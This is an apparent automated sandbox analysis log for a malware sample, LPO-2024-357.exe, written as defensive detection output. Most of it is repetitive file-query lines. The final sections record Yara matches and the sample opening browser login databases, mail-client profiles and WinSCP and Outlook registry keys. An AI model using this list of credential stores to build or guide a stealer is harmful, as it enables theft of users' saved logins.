                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Users\user\Desktop\LPO-2024-357.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 0.2.LPO-2024-357.exe.3d0a078.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.LPO-2024-357.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.LPO-2024-357.exe.3d33098.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.LPO-2024-357.exe.3d33098.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.LPO-2024-357.exe.3d0a078.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000004.00000002.2921447380.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1694260808.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 00000004.00000002.2923605654.000000000287A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.2923605654.0000000002821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: LPO-2024-357.exe PID: 4348, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                        Source: Yara matchFile source: 0.2.LPO-2024-357.exe.79a0000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.LPO-2024-357.exe.2dac680.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.LPO-2024-357.exe.79a0000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.LPO-2024-357.exe.2dac680.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1700975172.00000000079A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1694260808.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1690208458.0000000002B4F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: Yara matchFile source: 00000004.00000002.2923605654.0000000002821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: LPO-2024-357.exe PID: 4348, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: 0.2.LPO-2024-357.exe.3d0a078.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.LPO-2024-357.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.LPO-2024-357.exe.3d33098.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.LPO-2024-357.exe.3d33098.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.LPO-2024-357.exe.3d0a078.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000004.00000002.2921447380.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1694260808.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 00000004.00000002.2923605654.000000000287A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.2923605654.0000000002821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: LPO-2024-357.exe PID: 4348, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                        Source: Yara matchFile source: 0.2.LPO-2024-357.exe.79a0000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.LPO-2024-357.exe.2dac680.0.unpack, type: UNPACKEDPE
